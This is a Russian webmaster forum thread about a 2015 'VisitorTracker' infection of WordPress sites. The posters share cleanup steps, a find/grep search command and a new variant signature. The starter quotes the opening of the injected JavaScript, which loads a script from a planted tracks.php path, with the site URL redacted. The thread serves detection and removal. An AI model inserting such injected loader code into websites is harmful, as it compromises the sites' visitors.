X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> "Дыра" в Wordpress
mmkulikov
mmkulikov
Topic Starter сообщение 29.9.2015, 13:56; Ответить: mmkulikov
Сообщение #1


Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю)
Вот подробно о заразе
П.С.
Сегодня пол дня "коту под хвост" - сидел выковыривал эту погань на некоторых своих сайтах.
Нашел не на всех, но проверить пришлось все... :zloy:


--------------------
Сдается, обращаться скайп avdesk-it-kmm
VPS от 5€


Поблагодарили: (3)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vreg
Vreg
сообщение 29.9.2015, 13:58; Ответить: Vreg
Сообщение #2


Каким образом проверяли?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 29.9.2015, 14:08; Ответить: mmkulikov
Сообщение #3


Цитата(Vreg @ 29.9.2015, 11:58) *
Каким образом проверяли?

Для начала получил "письмо счастья" от гугла, а потом все сайты руками
Находится легко, благо не шифруется
Вот пример начала зараженного файла js
Код
/*visitorTracker*/
var visitortrackerin = setInterval(function(){
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
              if(visitorTracker_isMob()){
              var visitortrackervs = document.createElement("script"); visitortrackervs.src = "http://здесь_потер_урл_своего_сайта/wp-includes/SimplePie/Content/Type/main_configs/tracks.php?mob=1"; document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{

Удаляем все найденные куски (они все только в начале файла) между /*visitorTracker*/код_трояна/*visitorTracker*/
Ну и папку с файлом (может распологаться по разному и называться по разному)
В данном примере это wp-includes/SimplePie/Content/Type/main_configs/tracks.php
Где-то так-с :pionertrava:


--------------------
Сдается, обращаться скайп avdesk-it-kmm
VPS от 5€


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Вентилятор
Вентилятор
сообщение 29.9.2015, 14:20; Ответить: Вентилятор
Сообщение #4


Цитата(mmkulikov @ 29.9.2015, 12:56) *
Вот подробно о заразе


"Исследователи пишут, что сейчас малварь отсылает пользователей на vovagandon.tk (193.169.244.159)"


)))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 29.9.2015, 16:08; Ответить: x64
Сообщение #5


Поискать файлы можно так: коннектимся по SSH и выполняем команду:
Код
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker'

Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kagtus
kagtus
сообщение 29.9.2015, 17:11; Ответить: kagtus
Сообщение #6


ТС, из какой фразы статьи вытекает, что
Цитата
на сайтах под управлением WordPress (включая самую последнюю)

???

Сообщение отредактировал kagtus - 29.9.2015, 17:12


--------------------
ася 45два48499два
удалю вирусы, помогу с сайтом ->отзывы ТУТ и ТАМ
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
siteSgun
siteSgun
сообщение 30.9.2015, 2:33; Ответить: siteSgun
Сообщение #7


Цитата(mmkulikov @ 29.9.2015, 13:56) *
Эпидемия новой заразы на сайтах под управлением WordPress (включая самую последнюю)

Как раз самые последние версии, чаще всего, и подвержены подобным "налетам". Шанс найти уязвимость и широкое распространение не оставляет шансов остаться без внимания у хакеров.

Есть же стабильные предыдущие релизы, зачем каждый раз торопиться с обновлениями?..
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 30.9.2015, 11:55; Ответить: mmkulikov
Сообщение #8


Цитата(x64 @ 29.9.2015, 14:08) *
find /путь/к/сайтам/ -name '*.php' | xargs -n1 grep -rlF 'VisitorTracker'

Сегодня обнаружил "клон" этой заразы с уже другой сигнатурой /*161557fbea2c302f309892cd115a35aa*/
Вот же га... :censored:

P.S.
Кстати - ошибочка ) Не *.php надо, а *.js
Эта дрянь "живет" в js скриптах

Сообщение отредактировал mmkulikov - 30.9.2015, 11:57


--------------------
Сдается, обращаться скайп avdesk-it-kmm
VPS от 5€
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
x64
x64
сообщение 30.9.2015, 12:03; Ответить: x64
Сообщение #9


Цитата(mmkulikov @ 30.9.2015, 10:55) *
Кстати - ошибочка ) Не *.php надо, а *.js

Да хоть по всем файлам, но это ж долго, если что-то тяжёлое есть :)
Код
'*.php' → '*'
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
Topic Starter сообщение 30.9.2015, 12:18; Ответить: mmkulikov
Сообщение #10


Цитата(x64 @ 30.9.2015, 10:03) *
Да хоть по всем файлам, но это ж долго

У меня "сидело" и в "безликих" tetqwqsad0ehSvo и т.п. (около 3000 файлов)
И 'VisitorTracker' уже не панацея :hmhm:
Благо "стиль" заражения пока остался. Ключевое сло здесь наверное "пока" :_censored:


--------------------
Сдается, обращаться скайп avdesk-it-kmm
VPS от 5€
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.
19 Boymaster 11070 Сегодня, 0:01
автор: Boymaster
Открытая тема (нет новых ответов) Хостинг "Hostland" - качественный хостинг по разумным ценам и со своей Панелью Управления
0 artmeteor 374 18.4.2024, 22:46
автор: artmeteor
Открытая тема (нет новых ответов) ⭐⭐⭐ Google Voice | Gmail - OLD аккаунты "SMS и звонки" ⭐⭐⭐
15 Chekon 4444 18.4.2024, 12:00
автор: Chekon
Открытая тема (нет новых ответов) ✅ sms.chekons.com - ⭐ Сервис для получения SMS на реальные номера USA "Non-VoIP, безлим SMS, API" ⭐
Сервис для получения SMS на реальные номера USA
13 Chekon 4078 18.4.2024, 11:48
автор: Chekon
Открытая тема (нет новых ответов) Требуется помощь по сайту на "ВордПресс"
Закрылся доступ в панель администратора
15 Tia2 2349 17.4.2024, 0:54
автор: diviner99


 



RSS Текстовая версия Сейчас: 20.4.2024, 0:08
Дизайн